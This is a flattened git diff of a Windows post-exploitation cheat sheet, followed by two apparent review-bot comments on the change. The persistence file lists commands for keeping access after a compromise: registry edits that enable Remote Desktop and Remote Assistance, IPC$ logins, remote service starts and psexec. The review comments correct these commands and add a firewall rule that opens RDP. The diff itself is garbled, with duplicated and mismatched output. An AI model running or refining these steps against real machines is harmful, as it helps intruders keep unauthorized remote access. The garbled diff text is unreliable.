diff --git a/persistence/windows/general.md b/persistence/windows/general.md index 241ab27..651fbfd 100644 --- a/persistence/windows/general.md +++ b/persistence/windows/general.md @@ -13,21 +13,21 @@ return false; Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt. +### Remote Assistance Enable + * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f` + * **Description**: **Must be admin to run this.** Enable remote assistance through adding a registry entry on the local system. + * **Output**: + *
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+The operation completed successfully.-c:\> net use \\[TargetIP]\ipc$ username /user:password -c:\> sc \\[TargetIP] config netdde start= auto -c:\> sc \\[TargetIP] config netddedsdm start= auto -c:\> sc \\[TargetIP] config clipsrv start= auto -c:\> sc \\[TargetIP] start netdde -c:\> sc \\[TargetIP] start netddedsdm -c:\> sc \\[TargetIP] start clipsrv -+### Remote Desktop Enable - Method 1 + * **Command with arguments**: `reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f` + * **Description**: **Must be admin to run this.** Enable remote desktop through adding a registry entry on the local system. + * **Output**: + *
C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+The operation completed successfully.C:\Users\johndoe>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console johndoe 1 Active
rdp-tcp 65536 ListenC:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-The operation completed successfully.C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-The operation completed successfully.+c:\> net use \\[computername|IP]\ipc$ username /user:password +c:\> sc \\[computername|IP] config netdde start= auto +c:\> sc \\[computername|IP] config netddedsdm start= auto +c:\> sc \\[computername|IP] config clipsrv start= auto +c:\> sc \\[computername|IP] start netdde +c:\> sc \\[computername|IP] start netddedsdm +c:\> sc \\[computername|IP] start clipsrv ++ * **Example Command**: `psexec \\1.1.1.1 ipconfig /all` would retrieve the IP settings for the 1.1.1.1 system. ### tasklist * **Command with arguments**: `tasklist /v /s [computername|IP]` diff --git a/presence/windows/find_files.md b/presence/windows/find_files.md index 2dbcb7a..307d48a 100644 --- a/presence/windows/find_files.md +++ b/presence/windows/find_files.md @@ -18,7 +18,13 @@ Commands that find files on the filesystem and are usually executed from the con * **Command with arguments**: `dir /a` * **Description**: Displays files with specified attributes. Examples: D=Directories, R=Read-only files, H=Hidden files, A=Files ready for archiving, S=System files * **Output**: - *
C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16
Directory of c:\
01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free C:\Users\johndoe>dir /a c:\
Volume in drive C has no label. Volume Serial Number is 1A09-5F16
Directory of c:\
01/19/2008 03:45 AM $Recycle.Bin
09/18/2006 04:43 PM 24 autoexec.bat
10/08/2013 10:27 PM Boot
04/11/2009 08:00 AM 333,257 bootmgr
10/08/2013 10:27 PM 8,192 BOOTSECT.BAK
09/18/2006 04:43 PM 10 config.sys
01/19/2008 06:47 AM Documents and Settings [C:\Users]
10/23/2013 07:39 PM 2,460,454,912 pagefile.sys
01/19/2008 04:40 AM PerfLogs
10/08/2013 06:36 PM Program Files
10/08/2013 06:36 PM
10/10/2013 07:59 PM Users
10/23/2013 07:38 PM Windows
5 File(s) 2,460,796,395 bytes
10 Dir(s) 33,311,416,320 bytes free
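Review bot: in the `persistence/windows/general.md` hunk, the new `### Remote Assistance Enable` section's **Output** block does not match its **Command with arguments** line: the command sets `/v fAllowToGetHelp /t REG_DWORD /d 1`, but the captured output reads `C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`, which is the Remote Desktop command pasted a second time; re-capture it with `fAllowToGetHelp ... /d 1`. Two more things in the same hunk: both **Command with arguments** lines wrap the key path in curly quotes (`“HKEY_LOCAL_MACHINE\...\Terminal Server”`), which cmd.exe does not treat as quoting, so the space in `Terminal Server` splits the argument and a copy-pasted command fails; use straight `"` as the Output blocks already do. The re-added `c:\> net use \\[computername|IP]\ipc$ username /user:password` has its operands reversed: `net use` takes the password as the positional argument and the account in `/user:`, so it should read `net use \\[computername|IP]\ipc$ password /user:username`. Finally, a caveat belongs in the description: `netdde`, `netddedsdm` and `clipsrv` are the Network DDE / ClipBook services that Windows Vista and later no longer ship, so those `sc config`/`sc start` lines only apply to XP/2003-era targets, and flipping `fDenyTSConnections` to 0 still leaves RDP blocked unless the firewall allows it (for example `netsh advfirewall firewall set rule group="remote desktop" new enable=Yes`).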
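Review bot: in the `presence/windows/find_files.md` hunk the removed and added **Output** listings for `dir /a` are identical line for line (both run from `C:\Users\johndoe>dir /a c:\` to `10 Dir(s) 33,311,416,320 bytes free`), so the 7-to-13 line change is formatting only and the commit message should say so. While touching the block: the listing shows no `<DIR>` or `<JUNCTION>` column beside the ten directory entries (`$Recycle.Bin`, `Boot`, `Documents and Settings [C:\Users]`, ...) even though the footer counts `10 Dir(s)`; if the output sits in a raw `<pre>` in the markdown, write those markers as `&lt;DIR&gt;` / `&lt;JUNCTION&gt;` or the renderer swallows them as HTML tags, and the entry `10/08/2013 06:36 PM` with no name needs its name restored from the original capture. The **Description** could also state that `dir /a` with no attribute letters lists every entry including hidden and system ones, which is why `$Recycle.Bin`, `pagefile.sys` and `bootmgr` appear here and not in a plain `dir`.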